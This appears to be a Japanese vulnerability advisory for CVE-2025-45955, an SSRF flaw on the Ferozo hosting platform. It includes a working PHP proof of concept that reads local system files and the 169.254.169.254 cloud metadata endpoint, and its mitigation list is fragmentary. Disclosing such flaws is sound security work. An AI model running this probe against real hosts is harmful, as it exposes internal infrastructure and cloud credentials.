
攻撃者は、Ferozo ホスティングプラットフォーム上に特別に細工された PHP ファイルをアップロードして実行することで、この脆弱性を悪用できます。このファイルにアクセスすると、内部サービス(127.0.0.1、169.254.169.254、サービスメッシュエンドポイントなど)、ローカルファイル(例:file:///etc/passwd)、および既知のクラウドメタデータエンドポイントを標的とする一連の SSRF 試行が開始されます。スクリプトはレスポンスまたはエラーメッセージを収集し、攻撃者が内部インフラストラクチャをマッピングし、アクセス可能なサービスを列挙し、さらなる悪用のための機密情報を収集することを可能にします。
次のコードはこの脆弱性を実証しています:
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents、fopen など)を制限する127.0.0.0/8、169.254.169.254 など)へのアクセスをブロックするCVE-2025-45955
報告者: [Facundo Fernandez, Jinook Kim, Surendra Puppala / セキュリティ研究者 | @BYU]